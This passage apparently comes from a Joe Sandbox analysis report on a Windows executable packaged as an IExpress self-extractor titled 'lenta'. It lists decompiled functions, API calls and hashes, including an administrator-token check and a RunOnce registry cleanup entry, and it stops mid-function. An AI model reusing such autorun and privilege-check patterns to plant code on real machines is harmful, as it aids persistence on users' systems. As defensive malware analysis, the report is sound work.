                                                                                                                                                                                                                                            • wextract_cleanup0, xrefs: 008D227C, 008D22CD, 008D2363
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 008D2299
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008D2321
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                                                            • API String ID: 3027380567-2036266374
                                                                                                                                                                                                                                            • Opcode ID: cb9453daa20fd610e9b0f639ac607ecf78d6df9b63e38507111416319f959b0f
                                                                                                                                                                                                                                            • Instruction ID: 721b84c58676483ac98c959aa2fec9d5678cbe54e24f98ca5ce2db89ef72a867
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb9453daa20fd610e9b0f639ac607ecf78d6df9b63e38507111416319f959b0f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C31C871A00218ABDB259B55DC49FDAB77CFF54710F0003A7F50DE6251EA756F88CA50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                            			E008D3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            				struct HWND__* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					if( *0x8d8590 == 0) {
                                                                                                                                                                                                                                            						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                            						 *0x8d8590 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t8 - 1;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                            					EndDialog(_a4, ??);
                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                            				if(_t15 == 0) {
                                                                                                                                                                                                                                            					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t33 = _a4;
                                                                                                                                                                                                                                            					E008D43D0(_t33, _t16);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t33, 0x834,  *0x8d8d4c);
                                                                                                                                                                                                                                            					SetWindowTextA(_t33, "lenta");
                                                                                                                                                                                                                                            					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                            					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                            					 *0x8d88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                            					SetWindowLongA(_t34, 0xfffffffc, E008D30C0);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t15 != 1) {
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a12 != 6) {
                                                                                                                                                                                                                                            					if(_a12 != 7) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 008D313B
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 008D314B
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000834), ref: 008D316A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 008D3176
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 008D317D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000834), ref: 008D3185
                                                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000FC), ref: 008D3190
                                                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,008D30C0), ref: 008D31A3
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 008D31CA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                            • Opcode ID: 37c80058ed2bd57d6ffb77b7857283bc8e11549777b8b75762b9c724935aa03e
                                                                                                                                                                                                                                            • Instruction ID: 5f93ee0a40111ab21edc35a2b44337d0d28a069f33f581871233c3ab21e098b5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37c80058ed2bd57d6ffb77b7857283bc8e11549777b8b75762b9c724935aa03e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2311AF31246216BBDF156B24AC0CB5A3B64FB4A720F200713F826D22E0DB759A41C647
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E008D468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				CHAR* _t14;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 = __ecx;
                                                                                                                                                                                                                                            				_t11 = __edx;
                                                                                                                                                                                                                                            				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                            				_t16 = _t4;
                                                                                                                                                                                                                                            				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                            					if(_t16 == 0) {
                                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                            					FreeResource(_t15);
                                                                                                                                                                                                                                            					return _t16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46A0
                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46A9
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46C3
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46CC
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46D3
                                                                                                                                                                                                                                            • memcpy_s.MSVCRT ref: 008D46E5
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46EF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: TITLE$lenta
                                                                                                                                                                                                                                            • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                            • Opcode ID: c2f74627c2d826714f1479f11799466cab3f22a57adf5ade453fb50234364758
                                                                                                                                                                                                                                            • Instruction ID: f396dae84785b3b78845815971fdab7d883e13766246b9ff1aa052fb752e1fa1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2f74627c2d826714f1479f11799466cab3f22a57adf5ade453fb50234364758
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7601D6322412007BF31417A56C0DF2B3F2CFBC6B52F144216FB4AC6240CD71CC4082A2
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                                            			E008D17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t37 = __ecx;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                            					_v20 = _t20;
                                                                                                                                                                                                                                            					if(_t20 != 0) {
                                                                                                                                                                                                                                            						 *_t37 = 0;
                                                                                                                                                                                                                                            						_t28 = 1;
                                                                                                                                                                                                                                            						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                            							_t37 = _t39;
                                                                                                                                                                                                                                            							 *0x8da288(0, _v24, _v28);
                                                                                                                                                                                                                                            							_v20();
                                                                                                                                                                                                                                            							if(_t39 != _t39) {
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							FreeSid(_v24);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t36);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,008D18DD), ref: 008D181A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 008D182C
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(008D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,008D18DD), ref: 008D1855
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?,?,?,?,008D18DD), ref: 008D1883
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,008D18DD), ref: 008D188A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                            • Opcode ID: 68901455e7c5b40d7fdb4adb13be22d557d883f74ae29a968ec2bf5dd8faa530
                                                                                                                                                                                                                                            • Instruction ID: 5fbea8ff8a05be511d1c95d5842e59673e58b6ae4a873d382d3d200a3bee5aa5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68901455e7c5b40d7fdb4adb13be22d557d883f74ae29a968ec2bf5dd8faa530
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72115175E01209EBDB149FA5EC49ABEBB78FF44711F10026BF915E2391DB709D048B91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				int _t22;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t7 == 0) {
                                                                                                                                                                                                                                            					EndDialog(_a4, 2);
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t24 = _a4;
                                                                                                                                                                                                                                            					E008D43D0(_t24, _t12);
                                                                                                                                                                                                                                            					SetWindowTextA(_t24, "lenta");
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t24, 0x838,  *0x8d9404);
                                                                                                                                                                                                                                            					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t11 == 1) {
                                                                                                                                                                                                                                            					_t22 = _a12;
                                                                                                                                                                                                                                            					if(_t22 < 6) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 <= 7) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 != 0x839) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0x8d91dc = 1;
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 008D3490
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 008D349A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 008D34B2
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000838), ref: 008D34C4
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 008D34CB
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000002), ref: 008D34D8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                            • Opcode ID: 0309ea1e9407d320f6918030b4a23e74fc556a33b70204c2c4151082bdba0a60
                                                                                                                                                                                                                                            • Instruction ID: dc1e8a4f9fed1bed1dbd9e8b90874a8c54b5bcf636b69d0fabeb56159a4f9f6f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0309ea1e9407d320f6918030b4a23e74fc556a33b70204c2c4151082bdba0a60
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A01B131241129ABCB1A5F69EC0C9AE3B66FB15700F204313F947D67A0CB398F41CB8A
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E008D2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				char _t32;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				char* _t38;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                                                                                            				CHAR* _t59;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t60 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_t65 = _a4;
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t64 = __ecx;
                                                                                                                                                                                                                                            				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                            					GetModuleFileNameA( *0x8d9a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_t17 =  *_t64;
                                                                                                                                                                                                                                            						if(_t17 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                            						 *_t65 =  *_t64;
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t65[1] = _t64[1];
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                            							L19:
                                                                                                                                                                                                                                            							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                            								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                            									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                            										goto L19;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E008D1680(_t65, E008D17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            									_t52 = _t65;
                                                                                                                                                                                                                                            									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                            									_t60 = _t14;
                                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                                            										_t32 =  *_t52;
                                                                                                                                                                                                                                            										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                            									} while (_t32 != 0);
                                                                                                                                                                                                                                            									goto L17;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								E008D65E8( &_v268);
                                                                                                                                                                                                                                            								_t55 =  &_v268;
                                                                                                                                                                                                                                            								_t62 = _t55 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t34 =  *_t55;
                                                                                                                                                                                                                                            									_t55 = _t55 + 1;
                                                                                                                                                                                                                                            								} while (_t34 != 0);
                                                                                                                                                                                                                                            								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                            								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                            									 *_t38 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								E008D1680(_t65, E008D17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            								_t59 = _t65;
                                                                                                                                                                                                                                            								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                            								_t60 = _t12;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t42 =  *_t59;
                                                                                                                                                                                                                                            									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                            								} while (_t42 != 0);
                                                                                                                                                                                                                                            								L17:
                                                                                                                                                                                                                                            								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *_t65 = _t17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 008D2AE6
                                                                                                                                                                                                                                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 008D2AF2
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 008D2B12
                                                                                                                                                                                                                                            • CharUpperA.USER32 ref: 008D2B1E
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,?), ref: 008D2B55
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 008D2BD4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 571164536-0
                                                                                                                                                                                                                                            • Opcode ID: ebb49849cd702ef6a1aeea4c99112f93038c5761052266a94b2b2658dc97bcb7
                                                                                                                                                                                                                                            • Instruction ID: 71f70270d83ff9ae7573965cb89e5207ad5fffe36b118d83f75e6be9ec86c341
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebb49849cd702ef6a1aeea4c99112f93038c5761052266a94b2b2658dc97bcb7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F41E1346042459EDF199F349C54AFD7BA9FF66320F14029BE8C2D7302DBB58E868B61
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E008D43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				struct tagRECT _v24;
                                                                                                                                                                                                                                            				struct tagRECT _v40;
                                                                                                                                                                                                                                            				struct HWND__* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				int _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				int _v60;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
